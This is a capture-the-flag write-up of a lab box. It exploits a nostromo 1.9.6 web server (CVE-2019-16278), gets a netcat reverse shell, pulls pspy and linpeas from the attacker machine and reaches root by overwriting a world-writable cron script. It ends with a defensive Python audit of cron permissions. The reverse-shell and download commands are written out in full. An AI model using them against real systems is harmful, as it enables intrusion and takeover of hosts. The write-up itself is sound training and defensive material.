MY_FIRST_BLOG
Here is a link to my new blog! I read about a bunch of exploits in common server side blog tools so I just decided to make my website static. Hopefully that should keep it secure. Root owns the flag.
http://172.30.0.2/
my-first-blog.ovpn
Given the my-first-blog.ovpn file, I connected to the server.
$ sudo openvpn my-first-blog.ovpn
I saw the blog.
I checked the open ports with nmap.
$ nmap -sC -sV 172.30.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 06:53 EDT
Nmap scan report for 172.30.0.2
Host is up (0.13s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nostromo 1.9.6
|_http-generator: Hugo 0.54.0
|_http-server-header: nostromo 1.9.6
|_http-title: My first blog!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.48 seconds
The server runs nostromo 1.9.6.
The following RCE (CVE-2019-16278) can be used:
nostromo 1.9.6 - Remote Code Execution - Multiple remote Exploit
My IP is 172.30.0.14.
I listened on port 4444 and ran a reverse shell on the server.
$ nc -lnvp 4444
$ python cve2019_16278.py 172.30.0.2 80 "mkfifo /tmp/mwodv; nc 172.30.0.14 4444 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /tmp/mwodv"
I got a shell as the webserver user.
$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 50206
whoami
webserver
wget is available on the target, so we can use it to fetch tools.
wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
I uploaded pspy64s and linpeas to the server's /tmp directory.
GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions
$ python3 -m http.server
cd /tmp
wget http://172.30.0.14:8000/pspy64s
wget http://172.30.0.14:8000/linpeas.sh
ls
linpeas.sh  nostromo-1.9.6  oncufxq  pspy64s  shell.elf  start.sh
chmod +x pspy64s
chmod +x linpeas.sh
I ran pspy64s.
2020/03/22 11:21:02 CMD: UID=1000 PID=12542 | /bin/sh
2020/03/22 11:21:02 CMD: UID=1000 PID=12525 | sed s,:.*,&,
2020/03/22 11:21:02 CMD: UID=1000 PID=12524 | head -n 70
2020/03/22 11:21:02 CMD: UID=1000 PID=12523 | awk -F: {if (pre != $1){ print $0; }; pre=$1}
2020/03/22 11:21:02 CMD: UID=1000 PID=12522 | grep -Ev 0{20,}
2020/03/22 11:21:02 CMD: UID=1000 PID=12521 | grep -v \.tif$\|\.tiff$\|\.gif$\|\.jpeg$\|\.jpg\|\.jif$\|\.jfif$\|\.jp2$\|\.jpx$\|\.j2k$\|\.j2c$\|\.fpx$\|\.pcd$\|\.png$\|\.pdf$\|\.flv$\|\.mp4$\|\.mp3$\|\.gifv$\|\.avi$\|\.mov$\|\.mpeg$\|\.wav$\|\.doc$\|\.docx$\|\.xls$\|\.xlsx$
2020/03/22 11:21:02 CMD: UID=1000 PID=12520 | grep -v /.git/\|/sources/authors/
2020/03/22 11:21:02 CMD: UID=1000 PID=12519 | grep -RIEHo \$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*|[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}|\$H\$[a-zA-Z0-9_/\.]{31}|\$P\$[a-zA-Z0-9_/\.]{31}|\$S\$[a-zA-Z0-9_/\.]{52}|\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}|\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}|\{SHA\}[0-9a-zA-Z/_=]{10,} /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt
2020/03/22 11:21:02 CMD: UID=0    PID=11    | sleep 1000000
2020/03/22 11:21:02 CMD: UID=1000 PID=10    | nhttpd
2020/03/22 11:21:02 CMD: UID=0    PID=1     | bash /tmp/start.sh
2020/03/22 11:22:01 CMD: UID=0    PID=13302 | CRON
2020/03/22 11:22:01 CMD: UID=0    PID=13303 | /bin/sh -c /usr/bin/healthcheck
2020/03/22 11:22:01 CMD: UID=0    PID=13304 | /bin/bash /usr/bin/healthcheck
Cron ran /usr/bin/healthcheck as UID=0 (root).
Then the server ran nc -z localhost 80.
Next, I ran linpeas.sh.
linpeas gives us a lot of information.
The important part is the list of files we have write permission on.
(snip)
[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/run/lock
/sys/firmware
/tmp
/tmp/linpeas.sh
/tmp/pspy64s
/tmp/shell.elf
/usr/bin/healthcheck
/var/nostromo/conf
/var/nostromo/conf/mimes
/var/nostromo/conf/nhttpd.conf
/var/nostromo/conf/nhttpd.conf-dist
/var/nostromo/htdocs
/var/nostromo/htdocs/cgi-bin
/var/nostromo/htdocs/cgi-bin/printenv
/var/nostromo/icons
/var/nostromo/logs
/var/nostromo/logs/access_log
/var/nostromo/logs/nhttpd.pid
/var/tmp
(snip)
/usr/bin/healthcheck is writable by our user.
If we overwrite healthcheck and let cron run it, we get a root shell.
#!/bin/bash
mkfifo /tmp/mwodv; nc 172.30.0.14 4446 0</tmp/mwodv | /bin/sh >/tmp/mwodv 2>&1; rm /t
I uploaded a meterpreter payload and used the meterpreter upload command to put the new healthcheck in place.
meterpreter > upload healthcheck
[*] uploading  : healthcheck -> healthcheck
[*] Uploaded -1.00 B of 97.00 B (-1.03%): healthcheck -> healthcheck
[*] uploaded   : healthcheck -> healthcheck
I listened on port 4446 and got a root shell.
$ nc -lnvp 4446
listening on [any] 4446 ...
connect to [172.30.0.14] from (UNKNOWN) [172.30.0.2] 59984
whoami
root
So I got the flag.
cd
ls
flag.txt
cat flag.txt
gigem{l1m17_y0ur_p3rm15510n5}
FLAG : gigem{l1m17_y0ur_p3rm15510n5}
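The flag spells out the lesson: a script that root's cron executes must not be writable by anyone else. As an added example (my own code, not part of the original writeup or the target box), this Python audit parses a constructed /etc/crontab-style listing, resolves each root job's executable and reports any that a non-root user could modify; it runs against a staging tree so it can be tried without touching the live system.

```python
import os
import re
import stat
import tempfile
# Constructed /etc/crontab-style sample (not from the target): the first job mirrors
# the root entry pspy showed on the box, the second is a properly protected job.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
*   *  * * *   root  /usr/bin/healthcheck
*/5 *  * * *   root  /usr/local/bin/backup.sh
"""
# five schedule fields, the user, then the command
CRON_JOB = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
def cron_jobs(crontab_text):
    """Yield (user, first word of command) per job; skips comments and VAR=value lines."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_JOB.match(line)
        if m:
            yield m.group("user"), m.group("cmd").split()[0]

def writable_by_untrusted(path, trusted_uid):
    """True if anyone other than trusted_uid could modify what cron will execute."""
    st = os.stat(path)  # follow symlinks: cron runs the target, not the link
    return st.st_uid != trusted_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(crontab_text, prefix="", trusted_uid=0):
    """[(command, mode)] for root jobs whose executable is not root-only writable; prefix points at a staging tree."""
    findings = []
    for user, cmd in cron_jobs(crontab_text):
        if user != "root" or not cmd.startswith("/"):  # relative commands resolve via PATH
            continue
        path = prefix + cmd
        if os.path.exists(path) and writable_by_untrusted(path, trusted_uid):
            findings.append((cmd, oct(os.stat(path).st_mode & 0o777)))
    return findings

def demo():
    """Staging tree: healthcheck world-writable (the bug), backup.sh 0755 (the fix); files are owned by the caller, so its uid stands in for root."""
    with tempfile.TemporaryDirectory() as base:
        for rel, mode in (("usr/bin/healthcheck", 0o777), ("usr/local/bin/backup.sh", 0o755)):
            p = os.path.join(base, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            open(p, "w").close()
            os.chmod(p, mode)
        return audit(SAMPLE_CRONTAB, prefix=base, trusted_uid=os.geteuid())
```

On a real host, run audit() with the contents of /etc/crontab and the files under /etc/cron.d, leaving prefix empty and trusted_uid at 0; anything it reports is the same class of bug that gave root here.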
Thank you for reading.